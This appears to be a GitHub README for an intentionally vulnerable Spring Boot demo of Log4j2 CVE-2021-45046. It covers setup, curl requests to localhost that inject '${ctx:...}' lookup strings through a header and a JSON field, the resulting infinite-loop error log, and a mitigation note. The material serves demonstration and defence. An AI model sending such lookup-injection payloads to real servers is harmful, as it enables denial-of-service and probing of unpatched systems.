Sample Log4j2 vulnerable application (CVE-2021-45046)

Versions Affected: all versions from 2.0-beta9 to 2.15.0

This application is based on Spring Boot web application vulnerable to CVE-2021-45046

It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1).

Running the application

Run it:

Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

Exploitation steps

Then, trigger the exploit using:

For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${ctx:apiVersion}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${ctx:clientRef}"
}'

Notice the output showing Infinite loop, however in testing did not find out that this DOS to be resource consuming as this infinite loop identified by program and error out:


${ctx:clientRef}2021-12-15 19:27:50,212 http-nio-8080-exec-1 ERROR An exception occurred processing Appender LogToConsole java.lang.IllegalStateException: Infinite loop in property interpolation of  ${ctx:clientRef}: ctx:clientRef
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)

Mitigation :

Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default

pravin-pp/log4j2-CVE-2021-45046

Sample Log4j2 vulnerable application (CVE-2021-45046)

Versions Affected: all versions from 2.0-beta9 to 2.15.0

Running the application

Exploitation steps

Mitigation :